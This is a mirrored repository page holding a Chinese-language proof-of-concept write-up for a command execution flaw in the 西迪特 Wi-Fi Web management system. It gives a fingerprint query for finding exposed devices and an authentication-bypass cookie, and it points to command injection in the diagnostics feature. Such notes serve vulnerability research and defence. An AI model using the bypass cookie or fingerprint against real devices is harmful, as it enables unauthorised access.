admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/西迪特 Wi-Fi Web管理 jumpto.php 后台命令执行漏洞.md

33 lines
576 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# 西迪特 Wi-Fi Web管理 jumpto.php 后台命令执行漏洞
## 漏洞描述
西迪特 Wi-Fi Web管理系统后台过滤不足导致远程命令执行漏洞
## 漏洞影响
```
西迪特 Wi-Fi Web管理
```
## 网络测绘
```
title=="Wi-Fi Web管理"
```
## 漏洞复现o
登录页面
![image-20220519183944313](images/202205191841065.png)
通过越权漏洞获取权限添加Cookie
```
Cookie: timestamp=0; cooLogin=1; cooUser=admin
```
进入后台后,诊断功能点存在命令拼接执行漏洞
![image-20220519184158173](images/202205191841279.png)
Reference in New Issue Copy Permalink